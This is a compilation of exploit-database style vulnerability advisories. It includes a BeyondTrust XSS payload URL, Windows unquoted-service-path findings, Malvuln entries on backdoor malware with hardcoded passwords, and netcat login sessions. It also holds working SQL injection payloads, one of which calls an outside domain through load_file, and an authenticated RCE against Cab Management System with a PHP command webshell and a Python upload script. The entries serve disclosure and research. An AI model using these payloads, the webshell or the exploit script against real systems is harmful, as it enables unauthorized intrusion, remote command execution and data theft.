<pre><code># Exploit Title: BeyondTrust Remote Support - Reflected Cross-Site Scripting (XSS) (Unauthenticated)<br /># Google Dork: intext:"BeyondTrust" "Redistribution Prohibited"<br /># Date: 30/12/2021<br /># Exploit Author: Malcrove<br /># Vendor Homepage: https://www.beyondtrust.com/<br /># Version: v6.0 and earlier versions<br /># CVE: CVE-2021-31589 <br /><br />Summary:<br /><br />Unauthenticated cross-site scripting (XSS) vulnerability in BeyondTrust Secure Remote Access Base Software through 6.0.1 allow remote attackers to inject arbitrary web script or HTML. Remote attackers could acheive full admin access to the appliance, by tricking the administrator into creating a new admin account through an XSS/CSRF attack involving a crafted request to the /appliance/users?action=edit endpoint.<br /><br /><br />Vulnerability Details:<br /><br />Affected Endpoint: /appliance/login<br />Affected Parameter: login[password]<br />Request Method: GET or POST<br /><br /><br />Proof of concept (POC):<br /><br />By navigating to the below link from a modern web browser, alert(document.domain) Javascript method would be fired in the same context of Beyondtrust Remote Support domain.<br /><br />http://<bomgar-host>/appliance/login?login%5Bpassword%5D=test%22%3E%3Csvg/onload=alert(document.domain)%3E&login%5Buse_curr%5D=1&login%5Bsubmit%5D=Change%20Password<br /><br /><br />Mitigation:<br /><br />A fix has been released by the vendor in NSBase 6.1. It's recommended to update the vulnerable appliance base version to the latest version.<br /><br />- Time-Line:<br /><br /> April 6, 2021: Vulnerability advisory sent to the vendor (Beyondtrust)<br /> April 8, 2021: Recevied an initial reply from the vendor <br /> Jun 10, 2021: The vendor released a fix for the vulnerability in NSbase 6.1<br /> Dec 30, 2021: The Responsible public disclosure<br /><br /><br />- Credits<br />Ahmed Aboul-Ela (Malcrove)<br /><br /><br /><br /></code></pre>
<pre><code># Exploit Title: HMA VPN 5.3 - Unquoted Service Path<br /># Date: 18/02/2022<br /># Exploit Author: Saud Alenazi<br /># Vendor Homepage: https://www.hidemyass.com/<br /># Software Link: https://www.hidemyass.com/en-us/downloads<br /># Version: 5.3.5913.0<br /># Tested: Windows 10 Pro x64 es<br /><br /><br />C:\Users\saudh>sc qc HmaProVpn<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: HmaProVpn<br /> TYPE : 20 WIN32_SHARE_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : "C:\Program Files\Privax\HMA VPN\VpnSvc.exe"<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : HMA VPN<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /><br /><br />#Exploit:<br /><br />A successful attempt would require the local user to be able to insert their code in the system root path undetected by the OS or other security applications where it could potentially be executed during application startup or reboot. If successful, the local user's code would execute with the elevated privileges of the application.<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/b125a9a083447ad7d437e3e7f3ed5325_B.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.m<br />Vulnerability: Authentication Bypass<br />Description: The malware listens on TCP port 55555 and runs with SYSTEM integrity. The malware has an FTP component that can be enabled using the FTPD command. Third-party attackers who can reach the server can logon using any username password combination.<br />Type: PE32<br />MD5: b125a9a083447ad7d437e3e7f3ed5325 <br />Vuln ID: MVID-2021-0436<br />Dropped files: wrm.exe<br />Disclosure: 12/31/2021<br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 21<br />220 Welcome to X-Ftp server ...<br />USER malvuln<br />331 User name okay, need password.<br />PASS malvuln<br />230 User logged in, proceed.<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Microsoft Gaming Services 2.52.13001.0 - Unquoted Service Path<br /># Discovery by: Johto Robbie<br /># Discovery Date: May 12, 2021<br /># Tested Version: 2.52.13001.0<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on OS: Windows 10 x64 Home<br /><br /># Step to discover Unquoted Service Path:<br /><br />Go to Start and type cmd. Enter the following command and press Enter:<br /><br />C:\Users\Bang's>wmic service get name, displayname, pathname, startmode |<br />findstr /i "Auto" | findstr /i /v "C:\Windows\" | findstr /i /v """<br /><br />Gaming Services<br /> GamingServices C:\Program<br />Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe<br /><br /><br /><br /> Auto<br /><br />Gaming Services<br /> GamingServicesNet C:\Program<br />Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServicesNet.exe<br /><br /><br /><br /> Auto<br /><br />C:\Users\Bang's>sc qc "GamingServices"<br /><br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: GamingServices<br /><br /> TYPE : 210 WIN32_PACKAGED_PROCESS<br /><br /> START_TYPE : 2 AUTO_START<br /><br /> ERROR_CONTROL : 0 IGNORE<br /><br /> BINARY_PATH_NAME : C:\Program<br />Files\WindowsApps\Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe\GamingServices.exe<br /><br /> LOAD_ORDER_GROUP :<br /><br /> TAG : 0<br /><br /> DISPLAY_NAME : Gaming Services<br /><br /> DEPENDENCIES : staterepository<br /><br /> SERVICE_START_NAME : LocalSystem<br /><br />This application have no quote . And it contained in C:\Program Files. Put<br />mot malicious aplication with name "progarm.exe"<br /><br />Stop & Start: GamingServices. "progarm.exe" will be execute<br /><br />#Exploit:<br /><br />An unquoted service path in<br />Microsoft.GamingServices_2.52.13001.0_x64__8wekyb3d8bbwe, could lead to<br />privilege escalation during the installation process that is performed when<br />an executable file is registered. This could further lead to complete<br />compromise of confidentiality, Integrity and Availability.<br /><br />#Timeline<br />May 12, 2021 - Reported to Microsoft<br />Feb 11, 2022 - Confirmed vulnerability has been fixed<br /><br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2021<br />Original source: https://malvuln.com/advisory/b125a9a083447ad7d437e3e7f3ed5325.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Wollf.m<br />Vulnerability: Weak Hardcoded Password<br />Description: The malware listens on TCP port 55555 and runs with SYSTEM integrity. Authentication is required for remote user access. However, the password "alfaromeo" is weak and hardcoded within the executable and appears many times in a database of leaked passwords.<br />Type: PE32<br />MD5: b125a9a083447ad7d437e3e7f3ed5325<br />Vuln ID: MVID-2021-0435<br />Dropped files: wrm.exe<br />Disclosure: 12/31/2021 <br /><br />Exploit/PoC:<br />nc64.exe x.x.x.x 55555<br /><br />login: alfaromeo<br /><br />Login succeed!<br /><br />"Wollf Remote Manager" v1.6<br />Code by wollf, http://www.xfocus.org<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#help<br /><br />DOS Switch to MS-DOS prompt<br />DIR/LS/LIST Directory and file list<br />CD Entry directory<br />MD/MKDIR Make directory<br />PWD Get current dirctory<br />COPY/CP Copy file<br />DEL/RM Delete directory/file<br />REN/RENAME Rename file<br />MOVE/MV Move file<br />TYPE/CAT Type text file<br /><br />POPMSG Popup message box<br />SYSINFO Get system information<br />WHO/W Get current connections<br /><br />SHELL Execute command by system shell(cmd.exe)<br />EXEC/RUN Execute file by windows API(WinExec)<br />WS Windows list<br />PS Process list<br />KILL Kill process<br /><br />GET/GETFILE Download file from remote machine<br />PUT/PUTFILE Upload file to remote machine<br />WGET Get file from web server<br />FGET Get file from ftp server<br />FPUT Put file to ftp server<br />TELNET Connect to other host<br /><br />FTPD Start ftp service<br />TELNETD/TELD/EXPORT Start telnet service (export shell)<br /><br />REDIR Redirect tcp data from <Port> to <Dest_host:Dest_port><br />REDIR_STOP Stop redirect tcp data<br />SNIFF Sniff ftp/smtp/pop3/http password what via ethernet<br />SNIFF_STOP Stop ethernet sniffer<br />KEYLOG Start keyboard record<br />KEYLOG_STOP Stop keyboard record<br /><br />REBOOT Reboot windows<br />SHUTDOWN Shutdown windows<br />EXIT Close current connection<br />QUIT Close all connection and abort service<br />REMOVE Remove service<br />VER/VERSION Version information<br />HELP/H/? Show help message<br /><br />Type "HELP | MORE" for multipage display.<br /><br />Command "HELP" succeed.<br /><br />[DESKTOP-2C3IQHO@C:\WINDOWS\system32]#<br /><br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>
<pre><code># Exploit Title: Cab Management System 1.0 - 'id' SQLi (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html<br /># Version : 1.0<br /># Tested on: windows 10 xammp | Kali linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 18.02.2022<br />######## Description ########<br />#<br /># <br /># Authenticate and get update client settings will be appear the<br /># id paramater put your payload at there it'll be work <br /># <br />#<br />#<br />######## Proof of Concept ########<br /><br />========>>> REQUEST <<<=========<br /><br />GET /cms/admin/?page=clients/manage_client&id=1%27%20AND%20(SELECT%208928%20FROM%20(SELECT(SLEEP(10)))hVPW)%20AND%20%27qHYS%27=%27qHYS HTTP/1.1<br />Host: localhost<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"<br />sec-ch-ua-mobile: ?0<br />sec-ch-ua-platform: "Windows"<br />Upgrade-Insecure-Requests: 1<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9<br />Sec-Fetch-Site: none<br />Sec-Fetch-Mode: navigate<br />Sec-Fetch-User: ?1<br />Sec-Fetch-Dest: document<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=m1s7h9jremg0vj7ipk9m05n1nt<br />Connection: close<br /><br /></code></pre>
<pre><code># Exploit Title: TRIGONE Remote System Monitor 3.61 Unquoted Service Path<br /># Discovery by: Yehia Elghaly<br /># Date: 30-12-2021<br /># Vendor Homepage: https://www.trigonesoft.com/<br /># Software Link: https://www.trigonesoft.com/download/Remote_System_monitor_Server_3.61_x86_Setup.exe<br /># Tested Version: 3.61<br /># Vulnerability Type: Unquoted Service Path<br /># Tested on: Windows 7 x86 - Windows Server 2016 x64<br /><br /># Step to discover Unquoted Service Path:<br /><br />C:\>wmic service get name,displayname,pathname,startmode |findstr /i "auto"<br />|findstr /i /v "c:\windows\\" |findstr /i /v """<br /><br />TRIGONE Remote System Monitor Server RemoteSystemMonitorService <br />C:\Program Files\TRIGONE\Remote System Monitor Server\RemoteSystemMonitorService.exe <br />Auto<br /><br />C:\>sc qc srvInventoryWebServer<br />[SC] QueryServiceConfig SUCCESS<br /><br />SERVICE_NAME: RemoteSystemMonitorService<br /> TYPE : 10 WIN32_OWN_PROCESS<br /> START_TYPE : 2 AUTO_START<br /> ERROR_CONTROL : 1 NORMAL<br /> BINARY_PATH_NAME : C:\Program Files\TRIGONE\Remote System Monitor Serv<br />er\RemoteSystemMonitorService.exe<br /> LOAD_ORDER_GROUP :<br /> TAG : 0<br /> DISPLAY_NAME : TRIGONE Remote System Monitor Server<br /> DEPENDENCIES :<br /> SERVICE_START_NAME : LocalSystem<br /></code></pre>
<pre><code># Exploit Title: Cab Management System 1.0 - Remote Code Execution (RCE) (Authenticated)<br /># Exploit Author: Alperen Ergel<br /># Contact: @alpernae (IG/TW)<br /># Software Homepage: https://www.sourcecodester.com/php/15180/cab-management-system-phpoop-free-source-code.html<br /># Version : 1.0<br /># Tested on: windows 10 xammp | Kali linux<br /># Category: WebApp<br /># Google Dork: N/A<br /># Date: 18.02.2022<br />######## Description ########<br />#<br /># <br /># Step 1: Login admin account and go settings of site<br /># Step 2: Update web site icon and selecet a webshell.php<br /># Step3 : Upload your webshell that's it...<br />#<br />######## Proof of Concept ########<br /><br />========>>> START REQUEST <<<=========<br /><br />POST /cms/classes/SystemSettings.php?f=update_settings HTTP/1.1<br />Host: localhost<br />Content-Length: 11338<br />sec-ch-ua: "(Not(A:Brand";v="8", "Chromium";v="98"<br />Accept: */*<br />Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb<br />X-Requested-With: XMLHttpRequest<br />sec-ch-ua-mobile: ?0<br />User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36<br />sec-ch-ua-platform: "Windows"<br />Origin: http://localhost<br />Sec-Fetch-Site: same-origin<br />Sec-Fetch-Mode: cors<br />Sec-Fetch-Dest: empty<br />Referer: http://localhost/cms/admin/?page=system_info<br />Accept-Encoding: gzip, deflate<br />Accept-Language: tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7<br />Cookie: PHPSESSID=samlsgsrh4iq50eqc1qldpthml<br />Connection: close<br /><br /><br /><-- SNIPP HERE --><br />------WebKitFormBoundaryc5vp1oayEolowCbb<br />Content-Disposition: form-data; name="img"; filename="shell.php"<br />Content-Type: application/octet-stream<br /><br /><?php if(isset($_REQUEST['cmd'])){ echo "<pre>"; $cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?><br />------WebKitFormBoundaryc5vp1oayEolowCbb<br />Content-Disposition: form-data; name="cover"; filename=""<br />Content-Type: application/octet-stream<br />------WebKitFormBoundaryc5vp1oayEolowCbb--<br /><-- SNIPP HERE --><br /><br />========>>> END REQUEST <<<=========<br /><br /><br />========>>> EXPLOIT CODE <<<=========<br /><br /><br />import requests<br />print("""<br />--------------------------------------------<br />| |<br />| Author: Alperen Ergel (@alpernae) |<br />| | <br />| CAB Management System v1 Exploit |<br />| |<br />--------------------------------------------<br />""")<br />username = input("Username: ")<br />password = input("Password: ")<br />URL = input("Domain: ")<br /><br />burp0_url = "http://" + URL + "/cms/classes/Login.php?f=login"<br />burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "application/x-www-form-urlencoded; charset=UTF-8", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://192.168.1.33", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://192.168.1.33/cms/admin/login.php", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}<br />burp0_data = {"username": username, "password": password}<br />requests.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /><br />FILE = input("File: ")<br /><br />burp0_url = "http://" + URL + "/cms/classes/SystemSettings.php?f=update_settings"<br />burp0_headers = {"sec-ch-ua": "\"(Not(A:Brand\";v=\"8\", \"Chromium\";v=\"98\"", "Accept": "*/*", "Content-Type": "multipart/form-data; boundary=----WebKitFormBoundaryc5vp1oayEolowCbb", "X-Requested-With": "XMLHttpRequest", "sec-ch-ua-mobile": "?0", "User-Agent": "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/98.0.4758.82 Safari/537.36", "sec-ch-ua-platform": "\"Windows\"", "Origin": "http://localhost", "Sec-Fetch-Site": "same-origin", "Sec-Fetch-Mode": "cors", "Sec-Fetch-Dest": "empty", "Referer": "http://localhost/cms/admin/?page=system_info", "Accept-Encoding": "gzip, deflate", "Accept-Language": "tr-TR,tr;q=0.9,en-US;q=0.8,en;q=0.7", "Connection": "close"}<br />burp0_data = "------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"name\"\r\n\r\nCab Management System\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"short_name\"\r\n\r\nCMS - PHP\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[welcome]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"content[about]\"\r\n\r\n<ptest</p>\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"files\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"img\"; filename=\"" + FILE + "\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb\r\nContent-Disposition: form-data; name=\"cover\"; filename=\"\"\r\nContent-Type: application/octet-stream\r\n\r\n\r\n------WebKitFormBoundaryc5vp1oayEolowCbb--\r\n"<br />requests.post(burp0_url, headers=burp0_headers, data=burp0_data)<br /><br /></code></pre>
<pre><code>## Title: Computer and Mobile Repair Shop Management-1.0 SQL - Injections<br />## Author: nu11secur1ty<br />## Date: 12.28.2021<br />## Vendor: https://www.sourcecodester.com/users/tips23<br />## Software: https://www.sourcecodester.com/php/15108/computer-and-mobile-repair-shop-management-system-using-phpoop-free-source-code.html<br /><br />## Description:<br />The `code` parameter from /rsms/ node app, on Computer and Mobile<br />Repair Shop Management-1.0 appears to be vulnerable to SQL injection<br />attacks.<br />The payload '+(select<br />load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+'<br />was submitted in the code parameter.<br />This payload injects a SQL sub-query that calls MySQL's load_file<br />function with a UNC file path that references a URL on an external<br />domain.<br />The application interacted with that domain, indicating that the<br />injected SQL query was executed.<br />The attacker can take administrator account control on this system.<br /><br />[+] Payloads:<br /><br />```mysql<br />---<br />Parameter: code (GET)<br /> Type: time-based blind<br /> Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP)<br /> Payload: page=view_status&code=202778'+(select<br />load_file('\\\\uhf36ut6xyf0s9amr8axy7o8ezks8jwazyqlh96.nu11secur1tyPenetrationTestingEngineer.net\\kie'))+''<br />AND (SELECT 6180 FROM (SELECT(SLEEP(3)))nbQu) AND 'yOvj'='yOvj<br />---<br /><br />```<br /><br />## Reproduce:<br />[href](https://github.com/nu11secur1ty/CVE-nu11secur1ty/edit/main/vendors/oretnom23/RSMS-1.0)<br /><br />## Proof and Exploit:<br />[href](https://streamable.com/aa69kd)<br /><br /></code></pre>
<pre><code>Discovery / credits: Malvuln - malvuln.com (c) 2022<br />Original source: https://malvuln.com/advisory/3a505e7ea1beee556860488e34db8da6.txt<br />Contact: malvuln13@gmail.com<br />Media: twitter.com/malvuln<br /><br />Threat: Backdoor.Win32.Dsocks.10<br />Vulnerability: Hardcoded Cleartext Password<br />Description: The malware Coded by Drocon builds and creates backdoor servers, the supplied password is then hardcoded in cleartext in the PE file.<br />Type: PE32<br />MD5: 3a505e7ea1beee556860488e34db8da6<br />Vuln ID: MVID-2022-0496<br />Dropped files: server.exe<br />Disclosure: 02/21/2022<br /><br />Disclaimer: The information contained within this advisory is supplied "as-is" with no warranties or guarantees of fitness of use or otherwise. Permission is hereby granted for the redistribution of this advisory, provided that it is not altered except by reformatting it, and that due credit is given. Permission is explicitly given for insertion in vulnerability databases and similar, provided that due credit is given to the author. The author is not responsible for any misuse of the information contained herein and accepts no responsibility for any damage caused by the use or misuse of this information. The author prohibits any malicious use of security related information or exploits by the author or elsewhere. Do not attempt to download Malware samples. The author of this website takes no responsibility for any kind of damages occurring from improper Malware handling or the downloading of ANY Malware mentioned on this website or elsewhere. All content Copyright (c) Malvuln.com (TM).<br /></code></pre>